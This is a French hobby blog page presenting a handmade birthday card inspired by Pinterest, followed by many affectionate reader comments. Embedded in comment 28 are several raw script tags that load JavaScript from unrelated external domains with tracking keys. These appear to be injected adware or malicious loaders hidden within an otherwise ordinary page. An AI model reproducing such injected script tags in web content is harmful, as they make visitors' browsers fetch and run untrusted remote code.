• Joyeux Anniversaire Bicolore

     

     

    Joyeux Anniversaire Bicologre

     

    { Rubrique : "Bonjour"-"Divers" ICI } { La Femme : Rubrique "Mes Tubes"-"Femmes" ICI }

     

     

    Je vous remercie de tous vos commentaires sur mon Billet Précédent...

    Aujourd'hui, aussi, je viens vous montrer une carte anniversaire pour laquelle j'ai trouvé le modèle sur Pinterest, ceci dit je l'ai faite à ma sauce....

    Pour les Anniversaires à venir j'y travaille, j'aurai peut être un peu de retard....

     

     

    Joyeux Anniversaire Bicologre

     

     

     

     

    Joyeux Anniversaire Bicologre

     

     

     

     

    Joyeux Anniversaire Bicologre

     

    { Rubrique "Séparations"-"Fleurs,Nature,Animaux" ICI } { Les Fleurs : Rubrique "Mes Tubes"-"Fleurs" ICI }

     

     

     

     

    Joyeux Anniversaire Bicologre

     

    { Rubrique "Merci Visite"-"Divers" ICI } { Femme : Rubrique "Mes Tubes"-"Femmes" ICI }

     

     

     

     

     

    Joyeux Anniversaire Bicologre

     

    { Rubrique : "Jours"-"Mercredi"-"Hiver" ICI }

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    34
    Vendredi 5 Février 2021 à 14:30

    De belle cartes bravo a toi ma belle, au plaisir de ta Visite chez moi ,je te souhaite une belle balade sur Mes pages bisous amicalement Joe

    33
    Vendredi 5 Février 2021 à 13:59

    Ta carte est magnifique Valie ! Moi aussi je me sers beaucoup de Pinterest du moins au départ, tout comme toi... lol !

    A bientôt ! Bisous bisous !

    32
    Jacline-H-49
    Jeudi 4 Février 2021 à 20:08

    Une jolie carte à ta sauce, qui fera une heureuse.

    Félicitations et bonne soirée, douce nuit.

    GROS BISOUS TENDESSE de 

    Jacline

     

    31
    Jeudi 4 Février 2021 à 15:01

    Une très jolie carte et le jeune femme offerte dans tes images me plait bcp !

    Bisous

    30
    Jeudi 4 Février 2021 à 10:38

    Une très  joli carte magnifiquement  faite 

    Superbe bravo à toi gros bisous

    29
    Jeudi 4 Février 2021 à 08:41

    Une très jolie carte confectionnée à ta sauce

    il est vrai que pinterest donne des idées

    bravo, Bon jeudi

    28
    mamijojo77100
    Mercredi 3 Février 2021 à 23:20

    encore une belle carte. c est qu on a de lachance de s inspirer des copinettes ou de pinterest les idees ne manquent pas et bien sur on arrange a sa sauce comme tu dis..  J espere que tu te sens mieux chez toi maintenant. bises  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1612390678986" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    27
    Jeannine (cristal24)
    Mercredi 3 Février 2021 à 20:57

    Coucou,

    C'est bien de prendre des modèles de cartes ailleurs, et de les mettre à sa sauce, c'est un peu ce que je fais aussi.

    Et heureusement qu'on peut s'inspirer de modèles trouvés sur internet ou chez les copines, c'et ça aussi le partage.

    Bonne soirée.

    Grosses bises.

    Jeannine

    26
    Mercredi 3 Février 2021 à 20:10

    Très jolie ta carte bravo

    Pinterest est une source en or

    Gros bisous Pierrette67

    25
    Mercredi 3 Février 2021 à 20:09

    Bonsoir ma chère Valie

    C'est magnifique ce que tu as fait je suis en admiration .

    J'espère que tu es contente d'avoir retrouvé ton logement vu le temps qu'il fait ?

    Bonne soirée et gros bisous

    Janine

    24
    Mercredi 3 Février 2021 à 20:02

    Encore une bien belle carte

    Du beau travail

    Bravo à toi

    Bonne soirée

    Bisous

    23
    Mercredi 3 Février 2021 à 18:10

    Une belle carte d'anniversaire pour ton amieDouce soirée à toi et gros bisous tendresse

    22
    Mercredi 3 Février 2021 à 17:47
    dane

    coucou une bien jolie carte c' est super sympa bravo bisous a très vite 

    21
    Mercredi 3 Février 2021 à 17:39

    Tes cartes d'anniversaire sont magnifiques ma belle Valie et un grand merci pour tous les adorables gifs que tu nous offres si gentiment. Doux bisous !

    20
    Mercredi 3 Février 2021 à 17:19

    Des couleurs que j'aime, bravo ; c'est vrai que Pinterest est une bonne source d'inspiration ; bisous / Nicole

    19
    Mercredi 3 Février 2021 à 16:51

    elle est bien jolie 

    j'espère que ton retour s'est bien passé ? 

    Gros bisous 

    18
    Mercredi 3 Février 2021 à 15:46

    De nouveau une très jolie carte qui comblera une copinaute ! Gros bisous et à bientôt

    17
    Mercredi 3 Février 2021 à 13:53
    Hélène

    J'aime beaucoup, elle est très jolie cette carte, et également fort printanière !
    Gros Bisous

    16
    Gaelle
    Mercredi 3 Février 2021 à 12:43
    Jolie interprétation qui reflete bien ton envie de faire plaisir.
    Biz
    Gaelle
    15
    Mercredi 3 Février 2021 à 12:41

    Une jolie carte qui va faire une heureuse !

    Bonne journée.
    Bises.

    14
    marianne pirotte
    Mercredi 3 Février 2021 à 12:38

    Une carte toute jolie !!

    Gros bisous

    Marianne

    13
    Mercredi 3 Février 2021 à 12:15

    Très belle ta petite cartounette!! Bravo à toi.....

    J'aime beaucoup Pinterest aussi.

    Bisous et douce journée

    12
    Mercredi 3 Février 2021 à 11:17

    Jolie carte bravo pour ton inspiration .Bisous

    11
    Mercredi 3 Février 2021 à 11:09
    lamanuelle25

    Très sympa ta carte, gros bisous et bonne journée ici sous la pluie! Nadine

    10
    Mercredi 3 Février 2021 à 11:08

    Un moment unique et généreux...toujours cette beauté formidable..Je suis sacrément fan...

    Bonne journée Valie.

    9
    Jour de mai
    Mercredi 3 Février 2021 à 11:00

    Coucou Valie, 

    Une jolie et douce carte que tu as réalisée. 

    La personne qui la recevra sera ravie, je pense.

    Pinterest est une source d'inspiration, d'imagination et on y trouve tout "comme à la Samaritaine comme disait la publicité". 

    Excellent mercredi et que tout aille pour le mieux pour tous. 

    Gros bisous ♥♥♥

    LN

     

    8
    Mercredi 3 Février 2021 à 10:47

    Hello Valie

    Je souhaite un bon anniversaire à ton amie . 

    Ta carte est très belle 

    Je profite du peu d'internet pour te visiter et admirer ton travail  . 

    Nous avons une pluie terrible , les routes se ferment , inondées . Vivement le printemps , les beaux jours , le soleil , les oiseaux et les papillons ! Que ça nous manque ! 

    Pour l'instant , on vit un double confinement : on vit dans la cuisine car les peintres travaillent . Pas de télé , très peu d'internet , un peu à l'étroit   lol 

    J'espère que pour le fin de la semaine , ce sera fini mais j'en doute !  Une chose est bonne , c'est que je vais dormir très tôt ! Rien à faire le soir ! lol 

    Passe une bonne journée 

    gros bisous

    7
    Mercredi 3 Février 2021 à 09:16

    Elle est très réussie, bravo ma tite Valie!

    Bisous et belle journée

    6
    Mercredi 3 Février 2021 à 08:38

    très jolie carte avec de jolies petites roses, bravo ! et bon anniversaire ! bonne journée bisous

    5
    Mercredi 3 Février 2021 à 08:35

    une  très  jolie  carte bien  douce  et  bien  féminine  bravo !!!

     

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    4
    JO
    Mercredi 3 Février 2021 à 08:17

    Coucou ma Valie ♥

    Une petite merveille, douce et raffinée. J'aime beaucoup♥♥♥♥

    Bonne journée, chez moi douce de bon matin

    BISOUS ♥ BISOUS ♥

    JO

    3
    Mercredi 3 Février 2021 à 07:49

    très belle créa ! j'adore 

    c'est super ce site PINTEREST !

    bisous et bonne journée

    2
    Mercredi 3 Février 2021 à 07:46

    Très sympa ! Pour ma part aussi du retard dans les anniversaires... Tellement concentré sur les cartes de voeux que j'ai mis de côté les annivs ! 

    Bises

    Thaly

    1
    Mercredi 3 Février 2021 à 07:41

    Bonjour ma Valie, très jolie cette carte, tout comme toi je vais sur Pinterest, c'est un site qui m'inspire et d'ailleurs j'y ai un compte .... 

    Je te souhaite une belle et douce journée

    Gros bisous trempés

    Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :